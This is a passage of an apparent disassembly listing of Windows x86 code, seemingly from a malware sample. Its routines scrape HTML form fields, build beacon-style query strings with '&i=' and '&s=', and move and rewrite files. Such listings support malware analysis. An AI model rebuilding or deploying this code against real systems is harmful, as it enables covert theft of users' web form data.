push eax
push 4
lea eax, [ebp+var_8]
push eax
push esi
call dword_40FDF0 ; WriteFile
mov edi, eax
cmp edi, ebx
jz short loc_41CEB0
push ebx
lea eax, [ebp+var_10]
push eax
push [ebp+var_8]
push [ebp+var_C]
push esi
call dword_40FDF0 ; WriteFile
mov edi, eax
loc_41CEB0: ; CODE XREF: sub_41CD76+124�j
push [ebp+var_C]
call sub_41A83D
cmp edi, ebx
pop ecx
jz short loc_41CF1A
lea eax, [ebp+var_C]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_41AF34
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_8], eax
jz short loc_41CF1A
push ebx
lea eax, [ebp+var_10]
push eax
push 4
lea eax, [ebp+var_8]
push eax
push esi
call dword_40FDF0 ; WriteFile
mov edi, eax
cmp edi, ebx
jz short loc_41CF02
push ebx
lea eax, [ebp+var_10]
push eax
push [ebp+var_8]
push [ebp+var_C]
push esi
call dword_40FDF0 ; WriteFile
mov edi, eax
loc_41CF02: ; CODE XREF: sub_41CD76+176�j
push [ebp+var_C]
call sub_41A83D
cmp edi, ebx
pop ecx
jz short loc_41CF1A
push esi
call dword_40FE00 ; FlushFileBuffers
mov [ebp+var_1], 1
loc_41CF1A: ; CODE XREF: sub_41CD76+108�j
; sub_41CD76+145�j ...
push esi
call dword_40FDAC ; CloseHandle
cmp [ebp+var_1], bl
jnz short loc_41CF33
lea eax, [ebp+var_240]
push eax
call sub_41B052
pop ecx
loc_41CF33: ; CODE XREF: sub_41CD76+E8�j
; sub_41CD76+1AE�j
mov al, [ebp+var_1]
pop esi
loc_41CF37: ; CODE XREF: sub_41CD76+46�j
pop edi
loc_41CF38: ; CODE XREF: sub_41CD76+20�j
; sub_41CD76+2C�j
pop ebx
leave
retn
sub_41CD76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CF3B proc near ; CODE XREF: sub_415DD5+A3�p
var_48 = byte ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi]
push 1
lea ecx, [ebp+var_48]
push ecx
push esi
xor ebx, ebx
call dword ptr [eax+30h]
test eax, eax
jnz short loc_41CFA3
mov eax, [ebp+var_40]
cmp eax, 0A00000h
ja short loc_41CFA3
cmp [ebp+var_3C], ebx
jnz short loc_41CFA3
push edi
push eax
mov [ebp+arg_4], eax
call sub_41A81F
mov edi, eax
cmp edi, ebx
pop ecx
jz short loc_41CFA2
mov eax, [esi]
lea ecx, [ebp+arg_4]
push ecx
push [ebp+arg_4]
push edi
push esi
call dword ptr [eax+0Ch]
test eax, eax
jnz short loc_41CF9B
push [ebp+arg_4]
push edi
push [ebp+arg_0]
call sub_41CD76
add esp, 0Ch
mov bl, al
loc_41CF9B: ; CODE XREF: sub_41CF3B+4D�j
push edi
call sub_41A83D
pop ecx
loc_41CFA2: ; CODE XREF: sub_41CF3B+3B�j
pop edi
loc_41CFA3: ; CODE XREF: sub_41CF3B+1B�j
; sub_41CF3B+25�j ...
pop esi
mov al, bl
pop ebx
leave
retn
sub_41CF3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CFA9 proc near ; CODE XREF: sub_4151EE+17B�p
; .data:004185E0�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
push ebx
push 3
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
call sub_41B0FA
add esp, 10h
test al, al
jz short loc_41CFE4
push [ebp+var_C]
push [ebp+var_10]
push [ebp+arg_4]
call sub_41CD76
mov bl, al
lea eax, [ebp+var_10]
push eax
call sub_41B1B0
add esp, 10h
loc_41CFE4: ; CODE XREF: sub_41CFA9+1D�j
mov al, bl
pop ebx
leave
retn
sub_41CFA9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+10h]
sub esp, 18h
push ebx
xor ebx, ebx
mov [eax], ebx
mov eax, [ebp+14h]
push esi
mov esi, [ebp+8]
mov [eax], ebx
mov al, [esi+1]
mov cl, al
inc cl
test al, al
mov [esi+1], cl
jbe short loc_41D015
xor al, al
jmp loc_41D1AE
; ---------------------------------------------------------------------------
loc_41D015: ; CODE XREF: .data:0041D00C�j
push edi
push ebx
push 3
lea edi, [esi+20Ch]
lea eax, [esi+2]
push edi
push eax
call sub_41B0FA
add esp, 10h
test al, al
mov [esi], al
jz loc_41D1AB
mov edx, [esi+210h]
cmp edx, 8
mov [ebp-4], ebx
jbe loc_41D199
mov eax, [edi]
mov ecx, [eax]
lea ebx, [ecx-4]
cmp edx, ebx
jbe loc_41D199
cmp edx, 0A00000h
jnb loc_41D199
lea edx, [ebp-4]
push edx
push ecx
add eax, 4
push eax
call sub_41AF95
add esp, 0Ch
test eax, eax
mov [ebp-8], eax
jz loc_41D1A8
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
call sub_41BD39
test al, al
pop ecx
pop ecx
jz loc_41D199
mov eax, [edi]
mov ecx, [eax]
mov ebx, [ecx+eax+4]
mov eax, [esi+210h]
sub eax, 8
cmp ebx, eax
jnb loc_41D199
push 2
push offset dword_4031E4
push dword ptr [ebp+0Ch]
call sub_41A875
add esp, 0Ch
push dword_40FB2C
mov [ebp+8], eax
call dword_40FD94 ; lstrlenA
push eax
push dword_40FB2C
push dword ptr [ebp+8]
call sub_41A875
push 3
push offset aI ; "&i="
push eax
call sub_41A875
mov [ebp+8], eax
mov eax, dword_40FC1C
add eax, 44h
push 4
push eax
lea eax, [ebp-18h]
push eax
call sub_41A857
add esp, 24h
lea eax, [ebp-18h]
push eax
mov byte ptr [ebp-14h], 0
call dword_40FD94 ; lstrlenA
push eax
lea eax, [ebp-18h]
push eax
push dword ptr [ebp+8]
call sub_41A875
push 3
push offset aS ; "&s="
push eax
call sub_41A875
mov [ebp+8], eax
push 0Ah
lea eax, [ebp-18h]
push eax
push ebx
call sub_41A44B
push eax
lea eax, [ebp-18h]
push eax
push dword ptr [ebp+8]
call sub_41A875
push 3
push offset dword_4031E0
push eax
call sub_41A875
push dword ptr [ebp-8]
push dword ptr [ebp-4]
push eax
call sub_41A875
add esp, 48h
mov byte ptr [eax], 0
push dword ptr [ebp-4]
call sub_41A83D
mov eax, [edi]
mov ecx, [eax]
lea eax, [ecx+eax+8]
push ebx
push eax
call sub_41A893
mov ecx, [ebp+10h]
add esp, 0Ch
test eax, eax
mov [ecx], eax
jnz short loc_41D190
mov [esi], al
jmp short loc_41D1AB
; ---------------------------------------------------------------------------
loc_41D190: ; CODE XREF: .data:0041D18A�j
mov eax, [ebp+14h]
mov [eax], ebx
mov al, 1
jmp short loc_41D1AD
; ---------------------------------------------------------------------------
loc_41D199: ; CODE XREF: .data:0041D042�j
; .data:0041D051�j ...
cmp dword ptr [ebp-8], 0
jz short loc_41D1A8
push dword ptr [ebp-4]
call sub_41A83D
pop ecx
loc_41D1A8: ; CODE XREF: .data:0041D079�j
; .data:0041D19D�j
mov byte ptr [esi], 1
loc_41D1AB: ; CODE XREF: .data:0041D030�j
; .data:0041D18E�j
xor al, al
loc_41D1AD: ; CODE XREF: .data:0041D197�j
pop edi
loc_41D1AE: ; CODE XREF: .data:0041D010�j
pop esi
pop ebx
leave
retn 10h
; ---------------------------------------------------------------------------
dd 246C8D55h, 74EC818Ch, 53000006h, 0FC50858Dh, 5057FFFFh
dd 0FFE013E8h, 0FB34A1FFh, 0FF590040h, 50858D30h, 50FFFFFCh
dd 8C15FF50h, 330040FCh, 0FC1CA1DBh, 788B0040h, 504BEB58h
dd 0FE9C15FFh, 858D0040h, 0FFFFFA2Ch, 50858D50h, 50FFFFFCh
dd 0FE5A858Dh, 0FF50FFFFh, 40FC8C15h, 209D3900h, 74FFFFFAh
dd 1C9D3908h, 74FFFFFAh, 5A858D5Fh, 50FFFFFEh, 0FFDE25E8h
dd 2404C7FFh, 3E8h, 0FD6815FFh, 34A10040h, 0FF0040FBh
dd 190B0h, 50858D00h, 50FFFFFCh, 0FE5A858Dh, 0FF50FFFFh
dd 40FC8C15h, 858D00h, 50FFFFFAh, 0FE5A858Dh, 0FF50FFFFh
dd 40FE9415h, 0FFF88300h, 0FF79850Fh, 1CA1FFFFh, 8B0040FCh
dd 6FEB5478h, 6A64458Dh, 9D885010h, 0FFFFFE58h, 0FE599D88h
dd 0DBE8FFFFh, 8DFFFFEBh, 0FFFE5885h, 685350FFh, 40BAC3h
dd 0FABC35FFh, 4FE80040h, 83FFFFA6h, 0C08418C4h, 9D380F74h
dd 0FFFFFE58h, 0FE5885C6h, 7501FFFFh, 589D8806h, 8DFFFFFEh
dd 0E8506445h, 0FFFFDEDCh, 0FE589D38h, 7459FFFFh, 5A858D12h
dd 50FFFFFEh, 0FFDD69E8h, 0E8BF59FFh, 57000003h, 0FAB835FFh
dd 15FF0040h, 40FDB8h, 850FC085h, 0FFFFFEE1h, 0FAB40DFFh
dd 5B5F0040h, 0C974C583h, 560004C2h, 824748Bh, 224868Bh
dd 8E8B0000h, 228h, 8B51C82Bh, 2148Eh, 51C80300h, 0FFEB3DE8h
dd 0FF5959FFh, 21CB6h, 15FF00h, 8B0040FEh, 22886h, 24868900h
dd 0B0000002h, 8C25E01h
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+10h]
sub esp, 10h
push ebx
xor ebx, ebx
mov [eax], ebx
mov eax, [ebp+14h]
push esi
mov esi, [ebp+8]
mov [eax], ebx
mov eax, [esi+4]
cmp eax, ebx
lea ecx, [eax+1]
push edi
mov [esi+4], ecx
jnz loc_41D486
cmp [esi+1], bl
jz short loc_41D3ED
mov eax, dword_40FB34
push dword ptr [eax+24h]
call sub_41B06E
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_41D39E
loc_41D397: ; CODE XREF: .data:0041D3EB�j
; .data:0041D414�j
xor al, al
jmp loc_41D51F
; ---------------------------------------------------------------------------
loc_41D39E: ; CODE XREF: .data:0041D395�j
mov eax, dword_40FB34
push ebx
push ebx
push ebx
push ebx
push 8
push dword ptr [eax+30h]
call sub_41AAD0
add esp, 18h
push 3
lea eax, [esi+8]
push eax
push dword ptr [esi+210h]
call dword_40FE68 ; MoveFileExW
push ebx
push ebx
test eax, eax
push ebx
setnz al
mov [esi], al
mov eax, dword_40FB34
push ebx
push 7
push dword ptr [eax+30h]
call sub_41AAD0
push edi
call sub_41B0A5
add esp, 1Ch
cmp [esi], bl
jz short loc_41D397
loc_41D3ED: ; CODE XREF: .data:0041D381�j
push 80h
lea edi, [esi+8]
push edi
call dword_40FDB4 ; SetFileAttributesW
push 1
push 3
lea eax, [esi+214h]
push eax
push edi
call sub_41B0FA
add esp, 10h
cmp al, bl
mov [esi], al
jz short loc_41D397
push 2
push offset dword_4031E8
push dword ptr [ebp+0Ch]
call sub_41A875
add esp, 0Ch
push dword_40FB2C
mov edi, eax
call dword_40FD94 ; lstrlenA
push eax
push dword_40FB2C
push edi
call sub_41A875
push 3
push offset aI ; "&i="
push eax
call sub_41A875
mov edi, eax
mov eax, dword_40FC1C
add eax, 44h
push 4
push eax
lea eax, [ebp-10h]
push eax
call sub_41A857
add esp, 24h
lea eax, [ebp-10h]
push eax
mov [ebp-0Ch], bl
call dword_40FD94 ; lstrlenA
push eax
lea eax, [ebp-10h]
push eax
push edi
call sub_41A875
add esp, 0Ch
mov [eax], bl
loc_41D486: ; CODE XREF: .data:0041D378�j
mov eax, [esi+224h]
mov [esi+228h], eax
add eax, 4
cmp eax, [esi+218h]
mov byte ptr [esi], 1
mov [ebp+0Bh], bl
jnb short loc_41D51C
mov ecx, [esi+214h]
loc_41D4A9: ; CODE XREF: .data:0041D4D8�j
mov eax, [esi+228h]
cmp dword ptr [ecx+eax], 48414C4Ch
jnz short loc_41D4C8
mov edi, [ecx+eax+4]
cmp edi, 0A00000h
ja short loc_41D51C
cmp edi, ebx
jnz short loc_41D4DC
loc_41D4C8: ; CODE XREF: .data:0041D4B6�j
inc eax
mov [esi+228h], eax
add eax, 4
cmp eax, [esi+218h]
jb short loc_41D4A9
jmp short loc_41D51C
; ---------------------------------------------------------------------------
loc_41D4DC: ; CODE XREF: .data:0041D4C6�j
add edi, 8
push edi
call sub_41A81F
cmp eax, ebx
pop ecx
mov ecx, [ebp+10h]
mov [ecx], eax
jnz short loc_41D4F3
mov [esi], bl
jmp short loc_41D51C
; ---------------------------------------------------------------------------
loc_41D4F3: ; CODE XREF: .data:0041D4ED�j
mov ebx, [ebp+14h]
mov [ebx], edi
mov eax, [esi+228h]
add eax, [esi+214h]
push edi
push eax
push dword ptr [ecx]
call sub_41A857
mov eax, [ebx]
add esp, 0Ch
add [esi+228h], eax
mov byte ptr [ebp+0Bh], 1
loc_41D51C: ; CODE XREF: .data:0041D4A1�j
; .data:0041D4C2�j ...
mov al, [ebp+0Bh]
loc_41D51F: ; CODE XREF: .data:0041D399�j
pop edi
pop esi
pop ebx
leave
retn 10h
; ---------------------------------------------------------------------------
dw 8D55h
dd 818C246Ch, 47CECh, 0E8565300h, 0FFFFF48Eh, 58458950h
dd 0FE50858Dh, 0FF50FFFFh, 40FD9815h, 0FB34A100h, 70FF0040h
dd 50858D1Ch, 50FFFFFEh, 0FDA415FFh, 0DB330040h, 40FC1CA1h
dd 58708B00h, 0FBF8858Dh, 8D50FFFFh, 0FFFE5085h, 9D8850FFh
dd 0FFFFFE49h, 0FE9415FFh, 0F8830040h, 8D2075FFh, 0FFFBF885h
dd 75FF50FFh, 9415FF58h, 830040FEh, 840FFFF8h, 0B5h, 0FE4985C6h
dd 5001FFFFh, 0FE9C15FFh, 9D390040h, 0FFFFFC18h, 9D390874h
dd 0FFFFFC14h, 9D381B74h, 0FFFFFE49h, 8B850Fh, 858D0000h
dd 0FFFFFE50h, 0DA7CE850h, 0EB59FFFFh, 5C458D8Fh, 8850106Ah
dd 0FFFE489Dh, 4C9D89FFh, 89FFFFFEh, 5D896C5Dh, 0E87CE870h
dd 858DFFFFh, 0FFFFFE48h, 0BDED6850h, 2F680040h, 0FF0040BEh
dd 40FABC35h, 0A2ECE800h, 0C483FFFFh, 74C08418h, 489D380Fh
dd 0C6FFFFFEh, 0FFFE4885h, 67501FFh, 0FE489D88h, 458DFFFFh
dd 79E8505Ch, 38FFFFDBh, 0FFFE489Dh, 157459FFh, 0FE50858Dh
dd 0E850FFFFh, 0FFFFDA06h, 40FC1CA1h, 54708B00h, 35FF5659h
dd 40FAB8h, 0FDB815FFh, 0C0850040h, 0FEF6850Fh, 0DFFFFFFh
dd 40FAB4h, 0C5835B5Eh, 4C2C974h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D679 proc near ; CODE XREF: .data:0041F1D0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
push edi
call dword_40FD94 ; lstrlenA
push [ebp+arg_4]
mov [ebp+var_4], eax
call dword_40FD94 ; lstrlenA
push [ebp+arg_0]
mov ebx, eax
call dword_40FD94 ; lstrlenA
mov esi, eax
mov eax, [ebp+var_4]
add eax, edi
jmp short loc_41D6B0
; ---------------------------------------------------------------------------
loc_41D6AA: ; CODE XREF: sub_41D679+39�j
cmp byte ptr [eax], 2Fh
jz short loc_41D6B4
dec eax
loc_41D6B0: ; CODE XREF: sub_41D679+2F�j
cmp eax, edi
ja short loc_41D6AA
loc_41D6B4: ; CODE XREF: sub_41D679+34�j
cmp eax, edi
jnz short loc_41D6BC
loc_41D6B8: ; CODE XREF: sub_41D679+5E�j
xor eax, eax
jmp short loc_41D734
; ---------------------------------------------------------------------------
loc_41D6BC: ; CODE XREF: sub_41D679+3D�j
push 0
push 0
lea ecx, [ebp+arg_8]
push ecx
push ebx
push [ebp+arg_4]
sub eax, edi
inc eax
push eax
push edi
call sub_41A221
add esp, 1Ch
test al, al
jz short loc_41D6B8
lea eax, [esi+ebx+0Ah]
push eax
call sub_41A81F
push esi
push [ebp+arg_0]
mov edi, eax
push edi
call sub_41A857
mov eax, [ebp+arg_0]
add esp, 10h
cmp byte ptr [esi+eax-1], 2Fh
jz short loc_41D70D
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_8]
cmp byte ptr [ecx+eax], 2Fh
jz short loc_41D70D
mov byte ptr [edi+esi], 2Fh
inc esi
loc_41D70D: ; CODE XREF: sub_41D679+81�j
; sub_41D679+8D�j
mov eax, [ebp+arg_8]
mov ecx, ebx
sub ecx, eax
push ecx
mov ecx, [ebp+arg_4]
add eax, ecx
push eax
lea eax, [edi+esi]
push eax
call sub_41A857
mov eax, edi
sub eax, [ebp+arg_8]
add esp, 0Ch
add eax, esi
mov byte ptr [eax+ebx], 0
mov eax, edi
loc_41D734: ; CODE XREF: sub_41D679+41�j
pop edi
pop esi
pop ebx
leave
retn
sub_41D679 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D739 proc near ; CODE XREF: .data:0041EFCA�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
push [ebp+arg_0]
call dword_40FD94 ; lstrlenA
mov ebx, [ebp+arg_4]
push ebx
mov edi, eax
call dword_40FD94 ; lstrlenA
test edi, edi
jz short loc_41D7D5
test eax, eax
jz short loc_41D7D5
lea esi, [eax+ebx]
jmp short loc_41D76F
; ---------------------------------------------------------------------------
loc_41D762: ; CODE XREF: sub_41D739+38�j
mov cl, [esi]
cmp cl, 3Fh
jz short loc_41D773
cmp cl, 2Fh
jz short loc_41D773
dec esi
loc_41D76F: ; CODE XREF: sub_41D739+27�j
cmp esi, ebx
ja short loc_41D762
loc_41D773: ; CODE XREF: sub_41D739+2E�j
; sub_41D739+33�j
cmp esi, ebx
jz short loc_41D7D5
cmp byte ptr [esi], 2Fh
jz short loc_41D7D5
lea eax, [eax+edi+0Ah]
push eax
inc esi
call sub_41A81F
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_41D7D5
mov ebx, [ebp+arg_0]
push edi
push ebx
push eax
call sub_41A857
add esp, 0Ch
lea eax, [edi+ebx]
jmp short loc_41D7AF
; ---------------------------------------------------------------------------
loc_41D7A2: ; CODE XREF: sub_41D739+78�j
mov cl, [eax]
cmp cl, 3Fh
jz short loc_41D7B3
cmp cl, 2Fh
jz short loc_41D7B3
dec eax
loc_41D7AF: ; CODE XREF: sub_41D739+67�j
cmp eax, ebx
ja short loc_41D7A2
loc_41D7B3: ; CODE XREF: sub_41D739+6E�j
; sub_41D739+73�j
cmp eax, ebx
jz short loc_41D7BE
cmp byte ptr [eax], 3Fh
mov cl, 26h
jz short loc_41D7C0
loc_41D7BE: ; CODE XREF: sub_41D739+7C�j
mov cl, 3Fh
loc_41D7C0: ; CODE XREF: sub_41D739+83�j
mov ebx, [ebp+var_4]
lea eax, [ebx+edi]
mov [eax], cl
push esi
inc eax
push eax
call dword_40FDA0 ; lstrcpyA
mov eax, ebx
jmp short loc_41D7E1
; ---------------------------------------------------------------------------
loc_41D7D5: ; CODE XREF: sub_41D739+1E�j
; sub_41D739+22�j ...
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_41BC6D
pop ecx
pop ecx
loc_41D7E1: ; CODE XREF: sub_41D739+9A�j
pop edi
pop esi
pop ebx
leave
retn
sub_41D739 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 41Ch
push dword ptr [ebp+8]
lea eax, [ebp-41Ch]
push eax
call dword_40FDA0 ; lstrcpyA
lea eax, [ebp-41Ch]
push eax
call dword_40FD94 ; lstrlenA
loc_41D80C: ; CODE XREF: .data:0041D81B�j
dec eax
jz loc_41DA32
cmp byte ptr [ebp+eax-41Ch], 2Fh
jnz short loc_41D80C
mov ecx, dword_40FB34
push ebx
push dword ptr [ecx+174h]
lea eax, [ebp+eax-41Bh]
push eax
call dword_40FDA0 ; lstrcpyA
mov eax, dword_40FB34
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push dword ptr [eax+38h]
call dword_40FB3C
cmp eax, ebx
jz loc_41DA31
push edi
push ebx
push 0FFFFh
lea ecx, [ebp-14h]
push ecx
lea ecx, [ebp-41Ch]
push ecx
push eax
call sub_417186
mov edi, eax
add esp, 14h
cmp edi, ebx
jz loc_41DA30
push ebx
push ebx
lea eax, [ebp-8]
push eax
push edi
push dword ptr [ebp-14h]
push 9
push offset aSelect ; "*<select "
call sub_41A221
add esp, 1Ch
test al, al
jz loc_41DA27
mov eax, [ebp-8]
mov ecx, [ebp-14h]
push esi
mov [ebp-0Ch], ebx
lea esi, [eax+ecx]
sub edi, eax
mov [ebp-1], bl
jmp short loc_41D8B4
; ---------------------------------------------------------------------------
loc_41D8AE: ; CODE XREF: .data:0041D9EB�j
mov edi, [ebp-18h]
mov esi, [ebp-10h]
loc_41D8B4: ; CODE XREF: .data:0041D8AC�j
push 0
push 0
lea eax, [ebp-8]
push eax
push edi
push esi
push 12h
push offset aOptionSelected ; "*<option selected"
call sub_41A221
add esp, 1Ch
test al, al
jz loc_41D9FE
add esi, [ebp-8]
sub edi, [ebp-8]
jz loc_41D9FE
loc_41D8E1: ; CODE XREF: .data:0041D8E8�j
cmp byte ptr [esi], 3Eh
jz short loc_41D8EA
inc esi
dec edi
jnz short loc_41D8E1
loc_41D8EA: ; CODE XREF: .data:0041D8E4�j
test edi, edi
jz loc_41D9FE
inc esi
lea ecx, [esi+edi]
cmp esi, ecx
mov [ebp-10h], esi
mov eax, esi
jnb short loc_41D909
loc_41D8FF: ; CODE XREF: .data:0041D907�j
cmp byte ptr [eax], 3Ch
jz short loc_41D909
inc eax
cmp eax, ecx
jb short loc_41D8FF
loc_41D909: ; CODE XREF: .data:0041D8FD�j
; .data:0041D902�j
cmp eax, ecx
jz loc_41D9FE
mov ecx, eax
sub ecx, esi
cmp ecx, 200h
jg loc_41D9FE
mov ecx, [ebp-10h]
push 0
push 0
lea esi, [eax+1]
sub ecx, eax
mov byte ptr [eax], 0
lea eax, [ebp-8]
push eax
add edi, ecx
push edi
push esi
push 10h
push offset aInputValue ; "*<input *value=\""
call sub_41A221
add esp, 1Ch
test al, al
jz loc_41D9FE
add esi, [ebp-8]
sub edi, [ebp-8]
mov eax, esi
lea ecx, [esi+edi]
cmp esi, ecx
mov [ebp-18h], edi
jnb short loc_41D96B
loc_41D961: ; CODE XREF: .data:0041D969�j
cmp byte ptr [eax], 22h
jz short loc_41D96B
inc eax
cmp eax, ecx
jb short loc_41D961
loc_41D96B: ; CODE XREF: .data:0041D95F�j
; .data:0041D964�j
cmp eax, ecx
jz loc_41D9FE
mov ecx, eax
sub ecx, esi
cmp ecx, 200h
jg short loc_41D9FE
mov byte ptr [eax], 0
movzx eax, byte ptr [ebp-1]
push esi
inc eax
push eax
push dword ptr [ebp-10h]
push eax
mov eax, dword_40FB34
push dword ptr [eax+17Ch]
lea eax, [ebp-41Ch]
push 400h
push eax
call dword_40FC88
lea esi, [eax+ebx]
mov [ebp-1Ch], eax
lea eax, [esi+0Ah]
push eax
push dword ptr [ebp-0Ch]
call sub_41BE45
mov edi, eax
add esp, 24h
test edi, edi
jz short loc_41D9F3
push dword ptr [ebp-1Ch]
lea eax, [ebp-41Ch]
push eax
lea eax, [edi+ebx]
push eax
mov [ebp-0Ch], edi
call sub_41A857
add esp, 0Ch
inc byte ptr [ebp-1]
cmp byte ptr [ebp-1], 3
mov ebx, esi
mov byte ptr [edi+ebx], 0
jb loc_41D8AE
jmp short loc_41D9FE
; ---------------------------------------------------------------------------
loc_41D9F3: ; CODE XREF: .data:0041D9C3�j
push dword ptr [ebp-0Ch]
call sub_41A83D
pop ecx
xor ebx, ebx
loc_41D9FE: ; CODE XREF: .data:0041D8CF�j
; .data:0041D8DB�j ...
test ebx, ebx
pop esi
jz short loc_41DA27
push dword ptr [ebp-0Ch]
mov eax, dword_40FB34
add ebx, 64h
push ebx
push dword ptr [eax+178h]
push 2
call sub_41CAA9
push dword ptr [ebp-0Ch]
call sub_41A83D
add esp, 14h
loc_41DA27: ; CODE XREF: .data:0041D894�j
; .data:0041DA01�j
push dword ptr [ebp-14h]
call sub_41A83D
pop ecx
loc_41DA30: ; CODE XREF: .data:0041D873�j
pop edi
loc_41DA31: ; CODE XREF: .data:0041D84E�j
pop ebx
loc_41DA32: ; CODE XREF: .data:0041D80D�j
push dword ptr [ebp+8]
call sub_41A83D
pop ecx
leave
retn 4
; =============== S U B R O U T I N E =======================================
sub_41DA3F proc near ; CODE XREF: .data:004157F5�p
xor eax, eax
push offset dword_4102F8
mov dword_4102EC, eax
mov dword_4102E8, eax
mov dword_4102F0, eax
mov dword_4102F4, eax
call dword_40FE80 ; InitializeCriticalSection
retn
sub_41DA3F endp
; =============== S U B R O U T I N E =======================================
sub_41DA61 proc near ; CODE XREF: sub_41DBE5+F�p
; sub_41E0EA+18�p ...
arg_0 = dword ptr 4
push esi
mov esi, dword_4102E8
xor eax, eax
test esi, esi
jbe short loc_41DA8B
mov ecx, dword_4102EC
add ecx, 4
loc_41DA77: ; CODE XREF: sub_41DA61+28�j
mov edx, [ecx]
cmp edx, [esp+4+arg_0]
jnz short loc_41DA83
test edx, edx
jnz short loc_41DA8E
loc_41DA83: ; CODE XREF: sub_41DA61+1C�j
inc eax
add ecx, 38h
cmp eax, esi
jb short loc_41DA77
loc_41DA8B: ; CODE XREF: sub_41DA61+B�j
or eax, 0FFFFFFFFh
loc_41DA8E: ; CODE XREF: sub_41DA61+20�j
pop esi
retn
sub_41DA61 endp
; =============== S U B R O U T I N E =======================================
sub_41DA90 proc near ; CODE XREF: sub_41DBE5+1D�p
; .data:0041E62F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, dword_4102E8
push esi
xor edx, edx
test eax, eax
push edi
jbe short loc_41DAC0
mov ecx, dword_4102EC
lea esi, [ecx+4]
loc_41DAA6: ; CODE XREF: sub_41DA90+21�j
cmp dword ptr [esi], 0
jz short loc_41DAB5
inc edx
add esi, 38h
cmp edx, eax
jb short loc_41DAA6
jmp short loc_41DAC0
; ---------------------------------------------------------------------------
loc_41DAB5: ; CODE XREF: sub_41DA90+19�j
mov esi, edx
imul esi, 38h
add esi, ecx
mov edi, edx
jnz short loc_41DAF1
loc_41DAC0: ; CODE XREF: sub_41DA90+B�j
; sub_41DA90+23�j
inc eax
imul eax, 38h
push eax
push offset dword_4102EC
call sub_41C8EA
test al, al
pop ecx
pop ecx
jnz short loc_41DADA
or eax, 0FFFFFFFFh
jmp short loc_41DB0A
; ---------------------------------------------------------------------------
loc_41DADA: ; CODE XREF: sub_41DA90+43�j
mov edi, dword_4102E8
inc dword_4102E8
mov esi, edi
imul esi, 38h
add esi, dword_4102EC
loc_41DAF1: ; CODE XREF: sub_41DA90+2E�j
push 38h
push esi
call sub_41BE72
mov eax, [esp+10h+arg_0]
mov [esi+4], eax
mov eax, [esp+10h+arg_4]
pop ecx
mov [esi], eax
pop ecx
mov eax, edi
loc_41DB0A: ; CODE XREF: sub_41DA90+48�j
pop edi
pop esi
retn
sub_41DA90 endp
; =============== S U B R O U T I N E =======================================
sub_41DB0D proc near ; CODE XREF: sub_41DB85+C�p
; sub_41E71F:loc_41ED20�p
test byte ptr [esi], 1
jz short loc_41DB3D
push dword ptr [esi+20h]
call sub_41A83D
push dword ptr [esi+14h]
call sub_41A83D
push dword ptr [esi+28h]
call sub_41A83D
push dword ptr [esi+2Ch]
call sub_41A83D
push dword ptr [esi+30h]
call sub_41A83D
add esp, 14h
loc_41DB3D: ; CODE XREF: sub_41DB0D+3�j
test byte ptr [esi], 2
jz short loc_41DB5D
push dword ptr [esi+10h]
call dword_40FB40
push dword ptr [esi+0Ch]
call dword_40FB40
push dword ptr [esi+8]
call dword_40FB40
loc_41DB5D: ; CODE XREF: sub_41DB0D+33�j
mov eax, [esi]
test al, 30h
jz short loc_41DB80
test al, 20h
jz short loc_41DB77
mov eax, [esi+34h]
test eax, eax
jz short loc_41DB77
push dword ptr [eax+14h]
call sub_41A83D
pop ecx
loc_41DB77: ; CODE XREF: sub_41DB0D+58�j
; sub_41DB0D+5F�j
push dword ptr [esi+34h]
call sub_41A83D
pop ecx
loc_41DB80: ; CODE XREF: sub_41DB0D+54�j
and dword ptr [esi+4], 0
retn
sub_41DB0D endp
; =============== S U B R O U T I N E =======================================
sub_41DB85 proc near ; CODE XREF: .data:0041F2CD�p
imul eax, 38h
add eax, dword_4102EC
push esi
mov esi, eax
call sub_41DB0D
mov eax, dword_4102E8
test eax, eax
jbe short loc_41DBE3
mov ecx, dword_4102EC
mov edx, eax
imul edx, 38h
lea edx, [edx+ecx-38h]
cmp esi, edx
jnz short loc_41DBE3
cmp eax, 1
jnz short loc_41DBCD
push ecx
call sub_41A83D
and dword_4102EC, 0
and dword_4102E8, 0
jmp short loc_41DBE2
; ---------------------------------------------------------------------------
loc_41DBCD: ; CODE XREF: sub_41DB85+30�j
dec eax
mov dword_4102E8, eax
imul eax, 38h
push eax
push offset dword_4102EC
call sub_41C8EA
pop ecx
loc_41DBE2: ; CODE XREF: sub_41DB85+46�j
pop ecx
loc_41DBE3: ; CODE XREF: sub_41DB85+18�j
; sub_41DB85+2B�j
pop esi
retn
sub_41DB85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DBE5 proc near ; CODE XREF: sub_41DCA5+32B�p
; sub_41E377+1DD�p
